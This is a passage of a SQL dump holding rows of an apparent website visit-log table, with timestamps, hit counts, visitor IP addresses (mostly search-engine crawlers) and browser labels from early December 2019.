112','other'),(466034,1575331265,2,2,0,0,'66.249.75.68','chrome'),(466035,1575332285,1,1,0,0,'66.249.69.126','chrome'),(466036,1575332451,4,4,0,0,'66.249.75.66','chrome'),(466037,1575332798,3,3,0,0,'66.249.75.64','chrome'),(466038,1575333157,1,1,0,0,'207.46.13.12','other'),(466039,1575334130,1,1,0,0,'66.249.69.126','chrome'),(466040,1575334716,1,1,0,0,'66.249.75.66','chrome'),(466041,1575335413,1,1,0,0,'207.46.13.128','other'),(466042,1575335416,1,1,0,0,'66.249.75.226','chrome'),(466043,1575335507,1,1,0,0,'66.249.69.98','chrome'),(466044,1575335536,1,1,0,0,'66.249.69.15','chrome'),(466045,1575335867,1,1,0,0,'93.77.131.16','chrome'),(466046,1575335919,1,1,0,0,'66.249.75.165','chrome'),(466047,1575337043,1,1,0,0,'207.46.13.128','other'),(466048,1575337293,1,1,0,0,'8.29.198.27','other'),(466049,1575337901,1,1,0,0,'85.209.90.125','chrome'),(466050,1575338254,1,1,0,0,'66.249.69.194','chrome'),(466051,1575338300,1,1,0,0,'66.249.75.226','chrome'),(466052,1575338517,2,2,0,0,'66.249.69.190','chrome'),(466053,1575339080,1,1,0,0,'207.46.13.12','other'),(466054,1575339413,1,1,0,0,'8.29.198.26','other'),(466055,1575339505,1,1,0,0,'213.180.203.44','other'),(466056,1575340465,1,1,0,0,'66.249.75.68','chrome'),(466057,1575341127,1,1,0,0,'207.46.13.12','other'),(466058,1575341997,1,1,0,0,'66.249.75.253','chrome'),(466059,1575342021,1,1,0,0,'66.249.75.162','chrome'),(466060,1575342971,2,2,0,0,'66.249.75.66','chrome'),(466061,1575343238,1,1,0,0,'157.55.39.206','other'),(466062,1575343712,1,1,0,0,'66.249.69.34','chrome'),(466063,1575344024,3,3,0,0,'66.249.75.64','chrome'),(466064,1575344852,1,1,0,0,'66.249.75.68','chrome'),(466065,1575344857,1,1,0,0,'66.249.75.66','chrome'),(466066,1575344952,1,1,0,0,'66.249.69.253','chrome'),(466067,1575346563,2,2,0,0,'66.249.75.68','chrome'),(466068,1575347050,2,2,0,0,'66.249.75.64','chrome'),(466069,1575347080,1,1,0,0,'35.168.110.137','other'),(466070,1575347258,1,1,0,0,'66.249.69.126','chrome'),(466071,1575347954,1,1,0,0,'207.46.13.113','other'),(466072,1575348100,1,1,0,0,'91.196.178.129','firefox'),(466073,1575348151,1,1,0,0,'8.29.198.25','other'),(466074,1575348603,1,1,0,0,'66.249.75.68','chrome'),(466075,1575349364,1,1,0,0,'66.249.75.64','chrome'),(466076,1575349477,2,2,0,0,'66.249.75.66','chrome'),(466077,1575350251,2,2,0,0,'66.249.75.68','chrome'),(466078,1575350270,1,1,0,0,'8.29.198.27','other'),(466079,1575350313,2,2,0,0,'66.249.75.64','chrome'),(466080,1575351766,1,1,0,0,'66.249.75.66','chrome'),(466081,1575352453,1,1,0,0,'66.249.75.68','chrome'),(466082,1575352811,1,1,0,0,'66.249.69.97','chrome'),(466083,1575352886,1,1,0,0,'213.180.203.44','other'),(466084,1575353319,1,1,0,0,'157.55.39.206','other'),(466085,1575354072,5,5,0,0,'66.249.75.64','chrome'),(466086,1575354160,2,2,0,0,'66.249.75.66','chrome'),(466087,1575354330,2,2,0,0,'66.249.75.68','chrome'),(466088,1575355386,1,1,0,0,'91.196.178.85','chrome'),(466089,1575356021,2,2,0,0,'66.249.75.68','chrome'),(466090,1575356320,1,1,0,0,'66.249.75.64','chrome'),(466091,1575356364,1,1,0,0,'193.93.76.219','chrome'),(466092,1575356420,2,2,0,0,'66.249.75.66','chrome'),(466093,1575357051,23,23,0,0,'194.34.133.197','chrome'),(466094,1575357603,1,1,0,0,'66.249.69.126','chrome'),(466095,1575358119,1,1,0,0,'66.249.75.64','chrome'),(466096,1575358357,1,1,0,0,'66.249.75.68','chrome'),(466097,1575358944,1,1,0,0,'91.196.178.173','chrome'),(466098,1575358954,1,1,0,0,'195.128.17.206','other'),(466099,1575359010,1,1,0,0,'8.29.198.27','other'),(466100,1575359174,1,0,1,0,'66.249.69.97',''),(466101,1575359205,1,1,0,0,'91.196.178.69','chrome'),(466102,1575359346,1,1,0,0,'213.180.203.44','other'),(466103,1575359900,1,1,0,0,'66.249.75.64','chrome'),(466104,1575360162,1,1,0,0,'207.46.13.122','other'),(466105,1575360475,1,1,0,0,'207.46.13.192','other'),(466106,1575360799,1,1,0,0,'31.129.166.111','chrome'),(466107,1575361070,3,3,0,0,'66.249.75.66','chrome'),(466108,1575361117,1,1,0,0,'8.29.198.27','other'),(466109,1575361166,1,1,0,0,'66.249.69.97','chrome'),(466110,1575361615,2,2,0,0,'66.249.75.64','chrome'),(466111,1575361790,1,1,0,0,'213.180.203.44','other'),(466112,1575362702,1,1,0,0,'66.249.75.66','chrome'),(466113,1575363043,1,1,0,0,'66.249.69.100','chrome'),(466114,1575363742,1,1,0,0,'66.249.75.68','chrome'),(466115,1575363830,1,1,0,0,'66.249.75.64','chrome'),(466116,1575364601,11,11,0,0,'188.143.233.6','firefox'),(466117,1575364808,2,2,0,0,'66.249.75.64','chrome'),(466118,1575365074,1,1,0,0,'66.249.75.68','chrome'),(466119,1575365506,1,1,0,0,'13.58.39.24','chrome'),(466120,1575366798,2,2,0,0,'66.249.75.68','chrome'),(466121,1575366812,3,3,0,0,'66.249.88.161','chrome'),(466122,1575366814,1,1,0,0,'46.211.139.182','chrome'),(466123,1575366817,1,1,0,0,'91.196.178.73','chrome'),(466124,1575366822,2,2,0,0,'66.249.83.201','chrome'),(466125,1575366906,3,3,0,0,'66.249.88.164','chrome'),(466126,1575366907,1,1,0,0,'66.249.83.199','chrome'),(466127,1575366917,1,1,0,0,'66.249.83.197','chrome'),(466128,1575366918,1,1,0,0,'66.102.9.164','chrome'),(466129,1575366919,2,2,0,0,'66.102.9.191','chrome'),(466130,1575366922,1,1,0,0,'66.249.88.191','chrome'),(466131,1575366993,1,1,0,0,'66.249.75.66','chrome'),(466132,1575368032,1,1,0,0,'213.180.203.44','other'),(466133,1575368156,1,1,0,0,'91.196.178.85','chrome'),(466134,1575368466,1,1,0,0,'37.73.90.86','chrome'),(466135,1575369015,1,1,0,0,'193.28.92.17','chrome'),(466136,1575369442,1,1,0,0,'95.134.189.48','chrome'),(466137,1575369872,1,1,0,0,'8.29.198.26','other'),(466138,1575370276,1,0,1,0,'207.46.13.122',''),(466139,1575370358,1,0,1,0,'157.55.39.65',''),(466140,1575370371,1,1,0,0,'91.196.178.73','chrome'),(466141,1575370548,1,1,0,0,'91.196.178.73','firefox'),(466142,1575370698,1,1,0,0,'66.249.75.68','chrome'),(466143,1575370794,1,1,0,0,'66.249.69.100','chrome'),(466144,1575371193,1,1,0,0,'207.46.13.192','other'),(466145,1575371318,1,1,0,0,'158.69.192.200','other'),(466146,1575371797,1,1,0,0,'66.249.75.68','chrome'),(466147,1575371973,1,1,0,0,'8.29.198.27','other'),(466148,1575372297,1,1,0,0,'109.74.154.72','chrome'),(466149,1575372403,1,0,1,0,'207.46.13.192',''),(466150,1575373459,1,0,1,0,'157.55.39.11',''),(466151,1575373607,1,1,0,0,'209.17.96.90','other'),(466152,1575373620,2,2,0,0,'66.249.75.64','chrome'),(466153,1575374214,1,0,1,0,'207.46.13.192',''),(466154,1575374474,1,1,0,0,'157.55.39.65','other'),(466155,1575374479,1,1,0,0,'157.55.39.11','other'),(466156,1575374484,2,1,1,0,'207.46.13.192',''),(466157,1575374852,1,1,0,0,'66.249.69.100','chrome'),(466158,1575375202,2,2,0,0,'66.249.75.66','chrome'),(466159,1575375335,1,1,0,0,'66.249.69.97','chrome'),(466160,1575375755,3,0,3,0,'207.46.13.97',''),(466161,1575375806,2,2,0,0,'66.249.75.68','chrome'),(466162,1575375908,1,1,0,0,'91.196.178.189','chrome'),(466163,1575376444,2,0,2,0,'157.55.39.11',''),(466164,1575376698,1,1,0,0,'91.196.178.73','chrome'),(466165,1575377066,1,0,1,0,'157.55.39.65',''),(466166,1575377385,2,2,0,0,'157.55.39.11','other'),(466167,1575377504,1,1,0,0,'66.249.75.66','chrome'),(466168,1575377630,1,1,0,0,'91.196.178.85','chrome'),(466169,1575377682,1,1,0,0,'66.249.75.64','chrome'),(466170,1575379123,1,1,0,0,'66.249.69.97','chrome'),(466171,1575379348,2,2,0,0,'66.249.75.64','chrome'),(466172,1575379660,2,2,0,0,'66.249.75.68','chrome'),(466173,1575379975,1,1,0,0,'207.46.13.97','other'),(466174,1575380476,2,2,0,0,'66.249.75.64','chrome'),(466175,1575380767,2,2,0,0,'66.249.75.66','chrome'),(466176,1575380774,1,1,0,0,'8.29.198.25','other'),(466177,1575380847,2,2,0,0,'66.249.75.68','chrome'),(466178,1575381402,1,1,0,0,'207.46.13.172','other'),(466179,1575381596,1,1,0,0,'66.249.75.64','chrome'),(466180,1575381719,1,1,0,0,'109.251.188.33','chrome'),(466181,1575381747,1,0,1,0,'207.46.13.97',''),(466182,1575382858,1,1,0,0,'8.29.198.26','other'),(466183,1575382958,1,1,0,0,'66.249.69.126','chrome'),(466184,1575383721,1,0,1,0,'207.46.13.172',''),(466185,1575383943,1,0,1,0,'157.55.39.226',''),(466186,1575384514,2,2,0,0,'66.249.75.64','chrome'),(466187,1575384556,1,1,0,0,'91.196.178.135','firefox'),(466188,1575385259,1,1,0,0,'66.249.69.126','chrome'),(466189,1575385856,1,1,0,0,'217.65.249.30','chrome'),(466190,1575385975,1,1,0,0,'207.46.13.97','other'),(466191,1575386649,1,1,0,0,'66.249.75.68','chrome'),(466192,1575386708,2,2,0,0,'66.249.75.64','chrome'),(466193,1575386822,1,1,0,0,'100.26.180.145','other'),(466194,1575387110,1,1,0,0,'91.196.178.69','chrome'),(466195,1575387367,2,2,0,0,'207.46.13.172','other'),(466196,1575387419,1,1,0,0,'66.249.69.100','chrome'),(466197,1575388133,2,2,0,0,'66.249.75.66','chrome'),(466198,1575388167,1,1,0,0,'66.249.75.68','chrome'),(466199,1575388541,1,1,0,0,'213.180.203.37','other'),(466200,1575388855,1,1,0,0,'207.46.13.97','other'),(466201,1575389613,1,1,0,0,'91.196.178.73','firefox'),(466202,1575389840,3,3,0,0,'66.249.75.68','chrome'),(466203,1575389968,1,0,1,0,'207.46.13.97',''),(466204,1575390139,2,2,0,0,'66.249.75.64','chrome'),(466205,1575390480,1,1,0,0,'207.46.13.97','other'),(466206,1575390689,12,12,0,0,'66.249.69.126','chrome'),(466207,1575390968,5,5,0,0,'66.249.75.68','chrome'),(466208,1575391378,11,11,0,0,'66.249.75.66','chrome'),(466209,1575391395,5,5,0,0,'66.249.69.97','chrome'),(466210,1575391398,1,0,1,0,'207.46.13.223',''),(466211,1575391406,31,31,0,0,'66.249.75.64','chrome'),(466212,1575391602,4,4,0,0,'66.249.69.126','chrome'),(466213,1575391678,1,1,0,0,'8.29.198.26','other'),(466214,1575392021,1,1,0,0,'66.249.69.100','chrome'),(466215,1575392184,1,1,0,0,'66.249.75.68','chrome'),(466216,1575393052,2,2,0,0,'66.249.75.64','chrome'),(466217,1575393204,1,1,0,0,'66.249.69.97','chrome'),(466218,1575393745,1,1,0,0,'8.29.198.26','other'),(466219,1575394027,1,0,1,0,'207.46.13.87',''),(466220,1575394279,3,3,0,0,'66.249.75.64','chrome'),(466221,1575394812,1,1,0,0,'213.180.203.37','other'),(466222,1575395113,1,1,0,0,'66.249.75.68','chrome'),(466223,1575395139,1,0,1,0,'207.46.13.97',''),(466224,1575395323,4,4,0,0,'66.249.75.64','chrome'),(466225,1575395400,1,0,1,0,'157.55.39.226',''),(466226,1575395698,1,1,0,0,'66.249.75.66','chrome'),(466227,1575395887,2,1,1,0,'157.55.39.226',''),(466228,1575396210,1,1,0,0,'213.180.203.44','other'),(466229,1575396291,1,1,0,0,'66.249.75.64','chrome'),(466230,1575396589,1,0,1,0,'207.46.13.97',''),(466231,1575396597,1,1,0,0,'66.249.75.68','chrome'),(466232,1575396681,5,5,0,0,'66.249.75.66','chrome'),(466233,1575397105,1,0,1,0,'207.46.13.87',''),(466234,1575397166,1,1,0,0,'66.249.69.100','chrome'),(466235,1575397478,1,1,0,0,'66.249.69.126','chrome'),(466236,1575397648,1,1,0,0,'66.249.69.97','chrome'),(466237,1575397660,2,2,0,0,'66.249.75.68','chrome'),(466238,1575397667,2,2,0,0,'66.249.75.66','chrome'),(466239,1575398008,1,1,0,0,'207.46.13.97','other'),(466240,1575398184,1,1,0,0,'157.55.39.226','other'),(466241,1575398331,2,2,0,0,'66.249.75.64','chrome'),(466242,1575398881,1,1,0,0,'93.77.131.16','chrome'),(466243,1575399018,1,1,0,0,'66.249.69.100','chrome'),(466244,1575399215,1,0,1,0,'207.46.13.97',''),(466245,1575399798,1,1,0,0,'93.77.131.16','chrome'),(466246,1575400512,2,2,0,0,'66.249.75.66','chrome'),(466247,1575400845,1,1,0,0,'157.55.39.226','other'),(466248,1575400967,3,2,1,0,'66.249.69.100',''),(466249,1575401150,2,1,1,0,'207.46.13.97',''),(466250,1575401324,1,1,0,0,'213.180.203.44','other'),(466251,1575401477,1,1,0,0,'66.249.75.66','chrome'),(466252,1575401936,1,1,0,0,'93.77.131.16','chrome'),(466253,1575402085,1,1,0,0,'66.249.69.126','chrome'),(466254,1575402278,1,1,0,0,'66.249.69.100','chrome'),(466255,1575402580,1,1,0,0,'8.29.198.27','other'),(466256,1575402771,1,1,0,0,'213.180.203.44','other'),(466257,1575403062,2,2,0,0,'66.249.75.64','chrome'),(466258,1575403070,1,1,0,0,'66.249.69.97','chrome'),(466259,1575403154,3,3,0,0,'66.249.75.68','chrome'),(466260,1575403158,3,0,3,0,'207.46.13.97',''),(466261,1575403372,1,1,0,0,'31.13.127.16','other'),(466262,1575403374,1,1,0,0,'31.13.127.4','other'),(466263,1575403405,2,0,2,0,'157.55.39.226',''),(466264,1575403626,1,0,1,0,'207.46.13.87',''),(466265,1575403802,1,1,0,0,'66.249.75.66','chrome'),(466266,1575403991,1,1,0,0,'66.249.75.64','chrome'),(466267,1575403998,3,2,1,0,'207.46.13.87',''),(466268,1575404037,1,1,0,0,'213.180.203.44','other'),(466269,1575404063,1,1,0,0,'66.249.75.68','chrome'),(466270,1575404256,1,1,0,0,'66.249.75.227','chrome'),(466271,1575404459,3,3,0,0,'66.249.75.253','chrome'),(466272,1575404540,1,1,0,0,'66.249.69.62','chrome'),(466273,1575404626,1,1,0,0,'8.29.198.25','other'),(466274,1575405165,3,1,2,0,'207.46.13.97',''),(466275,1575405331,1,1,0,0,'213.180.203.44','other'),(466276,1575405339,3,3,0,0,'66.249.75.226','chrome'),(466277,1575405421,1,1,0,0,'66.249.69.33','chrome'),(466278,1575405516,1,1,0,0,'176.104.1.210','chrome'),(466279,1575406117,1,1,0,0,'91.196.178.183','chrome'),(466280,1575406196,2,2,0,0,'66.249.75.227','chrome'),(466281,1575406261,2,0,2,0,'157.55.39.226',''),(466282,1575406555,1,1,0,0,'91.196.178.135','chrome'),(466283,1575406561,2,2,0,0,'66.249.75.253','chrome'),(466284,1575408138,1,1,0,0,'66.249.69.36','chrome'),(466285,1575408352,1,1,0,0,'91.201.190.14','chrome'),(466286,1575408386,1,1,0,0,'91.196.178.180','chrome'),(466287,1575408387,5,5,0,0,'213.180.203.44','other'),(466288,1575408496,1,1,0,0,'37.229.105.173','chrome'),(466289,1575408686,1,1,0,0,'207.46.13.87','other'),(466290,1575408943,1,1,0,0,'66.249.75.253','chrome'),(466291,1575409612,1,0,1,0,'157.55.39.226',''),(466292,1575410001,2,2,0,0,'66.249.75.226','chrome'),(466293,1575410231,3,3,0,0,'66.249.75.227','chrome'),(466294,1575410967,1,1,0,0,'66.249.75.253','chrome'),(466295,1575411653,2,2,0,0,'66.249.75.226','chrome'),(466296,1575411847,1,1,0,0,'66.249.69.62','chrome'),(466297,1575412210,2,2,0,0,'66.249.75.227','chrome'),(466298,1575412642,3,3,0,0,'66.249.75.226','chrome'),(466299,1575413009,1,1,0,0,'66.249.69.36','chrome'),(466300,1575413137,1,1,0,0,'66.249.75.227','chrome'),(466301,1575413297,6,6,0,0,'66.249.75.253','chrome'),(466302,1575413534,1,1,0,0,'8.29.198.26','other'),(466303,1575413584,3,3,0,0,'66.249.75.226','chrome'),(466304,1575413591,1,1,0,0,'66.249.69.33','chrome'),(466305,1575414239,3,3,0,0,'66.249.75.227','chrome'),(466306,1575415154,1,0,1,0,'157.55.39.226',''),(466307,1575415517,1,1,0,0,'8.29.198.25','other'),(466308,1575415895,1,1,0,0,'66.249.69.33','chrome'),(466309,1575415958,1,0,1,0,'207.46.13.97',''),(466310,1575416583,2,2,0,0,'66.249.75.227','chrome'),(466311,1575416656,1,1,0,0,'66.249.69.36','chrome'),(466312,1575416741,1,1,0,0,'66.249.75.226','chrome'),(466313,1575416913,1,1,0,0,'207.46.13.97','other'),(466314,1575417447,1,1,0,0,'213.180.203.44','other'),(466315,1575417556,1,0,1,0,'157.55.39.226',''),(466316,1575417796,1,1,0,0,'209.17.96.122','other'),(466317,1575417937,1,1,0,0,'66.249.69.62','chrome'),(466318,1575418316,1,1,0,0,'66.249.75.226','chrome'),(466319,1575418357,2,2,0,0,'66.249.75.227','chrome'),(466320,1575418487,1,0,1,0,'157.55.39.226',''),(466321,1575418870,1,1,0,0,'66.249.75.253','chrome'),(466322,1575419510,1,1,0,0,'66.249.75.226','chrome'),(466323,1575419647,1,1,0,0,'66.249.75.227','chrome'),(466324,1575420080,1,1,0,0,'51.68.152.26','chrome'),(466325,1575420082,1,1,0,0,'66.249.75.253','chrome'),(466326,1575420192,1,1,0,0,'66.249.69.33','chrome'),(466327,1575421089,1,1,0,0,'66.249.75.227','chrome'),(466328,1575421532,1,1,0,0,'213.180.203.44','other'),(466329,1575422125,3,3,0,0,'66.249.69.126','chrome'),(466330,1575422173,1,1,0,0,'66.249.69.101','chrome'),(466331,1575422274,1,0,1,0,'157.55.39.199',''),(466332,1575422316,2,2,0,0,'66.249.75.138','chrome'),(466333,1575422328,1,1,0,0,'213.180.203.37','other'),(466334,1575422386,1,1,0,0,'66.249.75.68','chrome'),(466335,1575422698,1,1,0,0,'207.46.13.97','other'),(466336,1575422772,2,1,1,0,'157.55.39.53',''),(466337,1575422797,4,4,0,0,'66.249.75.64','chrome'),(466338,1575422872,1,1,0,0,'66.249.69.100','chrome'),(466339,1575422917,1,1,0,0,'66.249.69.190','chrome'),(466340,1575422919,2,2,0,0,'66.249.69.97','chrome'),(466341,1575423014,1,1,0,0,'66.249.69.165','chrome'),(466342,1575423041,1,1,0,0,'66.249.69.94','chrome'),(466343,1575423106,1,1,0,0,'66.249.75.98','chrome'),(466344,1575423169,1,1,0,0,'66.249.75.66','chrome'),(466345,1575423211,1,0,1,0,'157.55.39.199',''),(466346,1575423790,1,1,0,0,'66.249.69.66','chrome'),(466347,1575423907,2,1,1,0,'157.55.39.226',''),(466348,1575424241,1,1,0,0,'157.55.39.53','other'),(466349,1575424305,1,1,0,0,'213.180.203.37','other'),(466350,1575424309,1,1,0,0,'66.249.69.94','chrome'),(466351,1575424369,1,1,0,0,'66.249.75.126','chrome'),(466352,1575424414,1,1,0,0,'8.29.198.27','other'),(466353,1575425203,1,1,0,0,'207.46.13.97','other'),(466354,1575425232,1,1,0,0,'157.55.39.53','other'),(466355,1575425457,1,1,0,0,'213.180.203.44','other'),(466356,1575425610,1,1,0,0,'157.55.39.226','other'),(466357,1575426396,1,1,0,0,'8.29.198.27','other'),(466358,1575426563,1,1,0,0,'66.249.75.226','chrome'),(466359,1575426593,3,3,0,0,'66.249.75.66','chrome'),(466360,1575426598,4,4,0,0,'66.249.75.64','chrome'),(466361,1575427058,1,1,0,0,'66.249.75.68','chrome'),(466362,1575427448,1,1,0,0,'200.105.218.205','chrome'),(466363,1575427760,2,2,0,0,'157.55.39.53','other'),(466364,1575428066,1,1,0,0,'207.46.13.97','other'),(466365,1575428268,1,1,0,0,'66.249.75.194','chrome'),(466366,1575429134,1,0,1,0,'157.55.39.226',''),(466367,1575429588,1,1,0,0,'66.249.70.62','chrome'),(466368,1575429768,2,2,0,0,'66.249.64.27','chrome'),(466369,1575430765,1,1,0,0,'46.173.114.25','chrome'),(466370,1575431012,25,25,0,0,'45.139.50.25','chrome'),(466371,1575431268,2,2,0,0,'66.249.64.28','chrome'),(466372,1575431998,1,1,0,0,'66.249.64.27','chrome'),(466373,1575432324,2,2,0,0,'66.249.64.28','chrome'),(466374,1575432531,1,0,1,0,'157.55.39.154',''),(466375,1575433019,1,1,0,0,'66.249.64.26','chrome'),(466376,1575433986,2,2,0,0,'66.249.70.36','chrome'),(466377,1575434154,2,2,0,0,'66.249.64.28','chrome'),(466378,1575434264,1,1,0,0,'66.249.64.27','chrome'),(466379,1575434321,1,1,0,0,'213.180.203.44','other'),(466380,1575434339,1,1,0,0,'188.166.25.52','chrome'),(466381,1575434912,2,1,1,0,'157.55.39.154',''),(466382,1575435251,3,3,0,0,'66.249.70.62','chrome'),(466383,1575435302,1,1,0,0,'8.29.198.27','other'),(466384,1575435686,1,1,0,0,'91.196.178.133','firefox'),(466385,1575435956,1,1,0,0,'66.249.70.33','chrome'),(466386,1575436242,1,0,1,0,'157.55.39.154',''),(466387,1575436410,1,1,0,0,'157.55.39.226','other'),(466388,1575436630,2,2,0,0,'66.249.64.26','chrome'),(466389,1575436943,1,1,0,0,'66.249.70.62','chrome'),(466390,1575437268,1,1,0,0,'8.29.198.27','other'),(466391,1575437595,1,0,1,0,'157.55.39.136',''),(466392,1575438919,2,1,1,0,'157.55.39.53',''),(466393,1575438956,1,0,1,0,'157.55.39.154',''),(466394,1575439030,1,1,0,0,'66.249.64.26','chrome'),(466395,1575439075,1,0,1,0,'157.55.39.136',''),(466396,1575439224,2,2,0,0,'66.249.64.27','chrome'),(466397,1575439535,1,1,0,0,'66.249.64.28','chrome'),(466398,1575439551,1,1,0,0,'39.99.169.152','other'),(466399,1575439919,1,1,0,0,'213.180.203.44','other'),(466400,1575439952,1,1,0,0,'157.55.39.154','other'),(466401,1575440426,1,1,0,0,'66.249.64.27','chrome'),(466402,1575440500,1,1,0,0,'66.249.70.62','chrome'),(466403,1575441863,1,1,0,0,'91.196.178.131','chrome'),(466404,1575442067,2,2,0,0,'91.196.178.85','chrome'),(466405,1575442679,1,1,0,0,'157.55.39.53','other'),(466406,1575442744,1,1,0,0,'157.55.39.226','other'),(466407,1575442854,1,1,0,0,'66.102.9.164','chrome'),(466408,1575442940,1,1,0,0,'66.249.70.33','chrome'),(466409,1575443095,1,1,0,0,'66.249.70.62','chrome'),(466410,1575443151,1,1,0,0,'66.249.64.28','chrome'),(466411,1575443707,1,1,0,0,'91.196.178.85','chrome'),(466412,1575444108,1,1,0,0,'157.55.39.136','other'),(466413,1575444481,2,2,0,0,'66.249.64.26','chrome'),(466414,1575444550,1,1,0,0,'157.55.39.251','other'),(466415,1575444875,1,1,0,0,'213.108.45.138','chrome'),(466416,1575445092,1,1,0,0,'91.196.178.131','chrome'),(466417,1575445149,1,1,0,0,'91.196.178.180','chrome'),(466418,1575445367,2,2,0,0,'66.249.64.27','chrome'),(466419,1575445592,1,1,0,0,'66.249.70.36','chrome'),(466420,1575445594,2,2,0,0,'66.249.64.28','chrome'),(466421,1575446173,1,1,0,0,'8.29.198.26','other'),(466422,1575446493,1,1,0,0,'91.196.178.93','chrome'),(466423,1575446607,1,1,0,0,'91.196.178.65','chrome'),(466424,1575447074,1,1,0,0,'94.23.58.212','firefox'),(466425,1575447758,1,1,0,0,'213.180.203.37','other'),(466426,1575447765,2,2,0,0,'66.249.64.26','chrome'),(466427,1575447895,1,1,0,0,'128.124.69.71','chrome'),(466428,1575448146,1,1,0,0,'8.29.198.25','other'),(466429,1575448268,3,3,0,0,'66.249.64.27','chrome'),(466430,1575448385,1,0,1,0,'66.249.64.28',''),(466431,1575448728,1,1,0,0,'66.249.70.62','chrome'),(466432,1575448758,1,1,0,0,'66.249.64.28','chrome'),(466433,1575449044,1,1,0,0,'213.180.203.44','other'),(466434,1575449093,1,1,0,0,'157.55.39.154','other'),(466435,1575449466,1,1,0,0,'66.249.70.36','chrome'),(466436,1575449554,3,3,0,0,'66.249.64.27','chrome'),(466437,1575449638,1,1,0,0,'66.249.70.62','chrome'),(466438,1575449797,2,2,0,0,'157.55.39.251','other'),(466439,1575450224,2,2,0,0,'37.55.79.80','chrome'),(466440,1575450346,3,3,0,0,'66.249.64.28','chrome'),(466441,1575451501,1,1,0,0,'66.249.70.36','chrome'),(466442,1575451506,1,1,0,0,'66.249.64.26','chrome'),(466443,1575452233,3,3,0,0,'66.249.64.27','chrome'),(466444,1575452462,8,8,0,0,'66.249.64.26','chrome'),(466445,1575452590,1,1,0,0,'66.249.64.28','chrome'),(466446,1575452683,1,1,0,0,'130.180.211.117','firefox'),(466447,1575452869,1,1,0,0,'91.196.177.46','chrome'),(466448,1575452934,2,2,0,0,'157.55.39.136','other'),(466449,1575453421,1,1,0,0,'66.249.64.27','chrome'),(466450,1575453572,2,2,0,0,'213.180.203.44','other'),(466451,1575454450,1,1,0,0,'66.249.70.33','chrome'),(466452,1575455063,1,1,0,0,'157.55.39.154','other'),(466453,1575455068,1,1,0,0,'157.55.39.226','other'),(466454,1575455093,1,1,0,0,'54.236.61.240','chrome'),(466455,1575455677,2,2,0,0,'66.249.64.27','chrome'),(466456,1575456144,1,1,0,0,'66.249.70.36','chrome'),(466457,1575456189,1,1,0,0,'213.180.203.44','other'),(466458,1575456228,2,2,0,0,'66.249.64.26','chrome'),(466459,1575456582,2,2,0,0,'95.213.141.126','opera'),(466460,1575457077,1,1,0,0,'8.29.198.26','other'),(466461,1575458080,1,1,0,0,'157.55.39.136','other'),(466462,1575458305,23,23,0,0,'45.139.50.25','chrome'),(466463,1575458318,1,1,0,0,'109.74.154.72','chrome'),(466464,1575459006,1,1,0,0,'8.29.198.27','other'),(466465,1575459101,1,1,0,0,'66.249.64.26','chrome'),(466466,1575459316,2,2,0,0,'37.55.79.80','chrome'),(466467,1575459459,1,1,0,0,'66.249.70.36','chrome'),(466468,1575459512,1,1,0,0,'66.249.64.28','chrome'),(466469,1575459742,1,1,0,0,'157.55.39.136','other'),(466470,1575459932,1,1,0,0,'157.55.39.154','other'),(466471,1575460002,1,1,0,0,'213.180.203.44','other'),(466472,1575461088,1,1,0,0,'157.55.39.136','other'),(466473,1575461115,1,1,0,0,'157.55.39.226','other'),(466474,1575461437,1,0,1,0,'66.249.64.26',''),(466475,1575461624,1,1,0,0,'157.55.39.251','other'),(466476,1575462120,3,3,0,0,'130.180.212.50','firefox'),(466477,1575462340,1,1,0,0,'157.55.39.226','other'),(466478,1575462816,1,1,0,0,'66.249.70.36','chrome'),(466479,1575462942,1,1,0,0,'66.249.70.33','chrome'),(466480,1575463133,1,1,0,0,'66.249.64.28','chrome'),(466481,1575463238,2,2,0,0,'66.249.64.27','chrome'),(466482,1575463244,3,3,0,0,'66.249.64.26','chrome'),(466483,1575463292,1,1,0,0,'66.249.70.62','chrome'),(466484,1575463559,1,1,0,0,'91.196.177.46','chrome'),(466485,1575463824,1,1,0,0,'157.55.39.136','other'),(466486,1575464050,1,1,0,0,'157.55.39.154','other'),(466487,1575464347,1,1,0,0,'66.249.64.27','chrome'),(466488,1575464697,1,1,0,0,'176.100.22.184','chrome'),(466489,1575464997,1,1,0,0,'91.196.178.180','chrome'),(466490,1575465798,4,4,0,0,'66.249.64.26','chrome'),(466491,1575465880,1,1,0,0,'66.249.70.33','chrome'),(466492,1575466066,1,1,0,0,'91.196.178.70','firefox'),(466493,1575466181,2,2,0,0,'66.249.64.28','chrome'),(466494,1575466186,2,2,0,0,'66.249.64.27','chrome'),(466495,1575466305,1,1,0,0,'66.249.70.36','chrome'),(466496,1575467065,1,1,0,0,'91.196.178.169','chrome'),(466497,1575467534,1,1,0,0,'157.55.39.154','other'),(466498,1575467628,1,1,0,0,'66.249.64.26','chrome'),(466499,1575467697,1,1,0,0,'91.196.178.85','chrome'),(466500,1575467981,1,1,0,0,'8.29.198.25','other'),(466501,1575468661,1,1,0,0,'91.196.178.88','chrome'),(466502,1575468809,1,1,0,0,'157.55.39.251','other'),(466503,1575468858,1,1,0,0,'91.196.178.93','chrome'),(466504,1575469273,2,2,0,0,'66.249.64.28','chrome'),(466505,1575469911,1,1,0,0,'173.212.224.157','other'),(466507,1575469913,1,1,0,0,'8.29.198.25','other'),(466508,1575469922,1,1,0,0,'157.55.39.226','other'),(466509,1575470258,1,1,0,0,'91.196.178.185','chrome'),(466510,1575470392,1,1,0,0,'157.55.39.136','other'),(466511,1575470870,1,1,0,0,'192.99.13.133','other'),(466512,1575471390,1,1,0,0,'157.55.39.136','other'),(466513,1575472349,5,5,0,0,'66.249.64.26','chrome'),(466514,1575472737,1,1,0,0,'91.196.178.180','chrome'),(466515,1575472802,2,2,0,0,'66.249.64.27','chrome'),(466516,1575473145,3,3,0,0,'66.249.64.28','chrome'),(466517,1575473647,2,2,0,0,'157.55.39.136','other'),(466518,1575473712,2,2,0,0,'66.249.64.26','chrome'),(466519,1575473844,1,1,0,0,'91.196.178.180','chrome'),(466520,1575475371,1,1,0,0,'66.249.64.26','chrome'),(466521,1575475486,1,1,0,0,'91.196.178.185','chrome'),(466522,1575475641,2,0,2,0,'157.55.39.226',''),(466523,1575475954,1,1,0,0,'66.249.70.36','chrome'),(466524,1575476903,2,2,0,0,'213.180.203.44','other'),(466525,1575477164,1,1,0,0,'157.55.39.226','other'),(466526,1575477211,1,1,0,0,'66.249.64.27','chrome'),(466527,1575477281,2,2,0,0,'46.133.200.14','chrome'),(466528,1575477419,1,1,0,0,'66.249.64.28','chrome'),(466529,1575478217,1,1,0,0,'77.74.177.114','chrome'),(466530,1575478270,1,1,0,0,'213.180.203.44','other'),(466531,1575478898,1,1,0,0